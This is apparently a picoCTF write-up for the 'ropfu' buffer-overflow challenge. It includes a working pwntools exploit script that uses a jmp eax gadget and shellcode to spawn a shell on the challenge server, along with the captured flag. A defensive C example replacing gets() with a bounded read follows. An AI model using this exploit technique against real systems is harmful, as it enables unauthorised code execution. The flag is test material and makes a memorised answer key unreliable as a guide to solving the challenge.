
ropfu

The hint and the source code clearly point towards ROP to get a shell.

  1. Get the position of the return address of vuln() relative to the input buffer

    • gdb ./vuln -> disas main -> vuln() ideally returns at 0x08049e1a
    • disas vuln -> set a breakpoint just after gets()
    • run -> give 10-15 a's as input -> at the breakpoint, x/100xg $ebp-200
    • return address spotted 28 bytes from the start of the input
  2. checksec ./vuln -> Arch: i386-32-little, Stack: Executable

    • Can inject shellcode to spawn a shell, but the shellcode is longer than the 28 bytes before the return address; use a NOP slide and a short jump over the return address
    • Find a jmp eax gadget (rip jumps to eax, which holds the buffer address, which will contain the shellcode) -> ROPgadget --binary ./vuln --only "jmp|eax"
  3. Use pwntools to construct and send the payload:

    ```python
    from pwn import *

    # local target
    p = process('./vuln')

    # remote target (overrides the local process)
    p = remote('saturn.picoctf.net', 61390)
    p.recvline()
    offset = 28                  # bytes from buffer start to the saved return address
    jmpshort = b'\xeb\x04'       # jump over the address
    nop = b'\x90'
    jmpeax = 0x0805333b          # jmp eax gadget
    shellcode = asm(shellcraft.i386.linux.sh())

    # NOP slide + short jump fill the 28 bytes, then the gadget address, then the shellcode
    payload = nop*(offset-len(jmpshort)) + jmpshort + p32(jmpeax) + shellcode
    p.sendline(payload)
    p.interactive()
    ```

    ```shell
    [+] Opening connection to saturn.picoctf.net on port 61390: Done
    [*] Switching to interactive mode
    $ ls
    flag.txt
    vuln
    $ cat flag.txt
    picoCTF{5n47ch_7h3_5h311_4cbbb771}$
    ```
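The overflow exists because vuln() reads the input with gets(), which has no length bound, so a 28-byte-plus line walks straight over the saved return address. As an added example (not part of the original writeup or the challenge binary), here is the bounded replacement a defender would use: a fixed-size fgets() read that always NUL-terminates, strips the newline and drains any excess so an over-long line is cut off instead of spilling past the buffer. The 16-byte buffer and the 40-byte input are constructed for the demo and fed through a tmpfile() so it runs offline.

```c
#include <stdio.h>
#include <string.h>

/* Bounded line read: the fix for the gets() pattern exploited above.
 * Reads at most size-1 bytes into buf, always NUL-terminates, strips the
 * trailing newline, and discards the rest of an over-long line so the
 * next read starts on a fresh line rather than on leftover bytes.
 * Returns 1 if the whole line fit, 0 if it was truncated. */
int read_line_bounded(FILE *in, char *buf, size_t size) {
    if (size == 0 || buf == NULL) return 0;
    if (fgets(buf, (int)size, in) == NULL) {
        buf[0] = '\0';            /* EOF or error: empty but still terminated */
        return 1;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 1;
    }
    /* No newline seen: the input was longer than the buffer. Drain it. */
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n') { }
    return 0;
}

/* Demo (constructed input): a 40-byte line followed by a short second line,
 * read through a 16-byte buffer. Sets *truncated to 1 if the first line was
 * cut. Returns the length stored for the first line, or -1 if the drain did
 * not leave the stream positioned on the second line. */
int demo_overlong_line(int *truncated) {
    char buf[16];
    char next[16];
    FILE *f = tmpfile();
    if (f == NULL) return -1;
    for (int i = 0; i < 40; i++) fputc('A', f);   /* constructed over-long line */
    fputs("\nsecond\n", f);
    rewind(f);
    *truncated = !read_line_bounded(f, buf, sizeof buf);
    int stored = (int)strlen(buf);
    /* because the excess was drained, the next read yields "second", not 'A's */
    read_line_bounded(f, next, sizeof next);
    fclose(f);
    if (strcmp(next, "second") != 0) return -1;
    return stored;
}

int main(void) {
    int truncated = 0;
    int n = demo_overlong_line(&truncated);
    printf("stored %d bytes, truncated=%d\n", n, truncated);
    return n < 0;
}
```

The checksec output above also shows the second weakness the chain relies on: with a non-executable stack, the jmp eax gadget would land on the shellcode and fault on its first byte, so building without an executable stack closes that half of the technique even if a bounded read is forgotten.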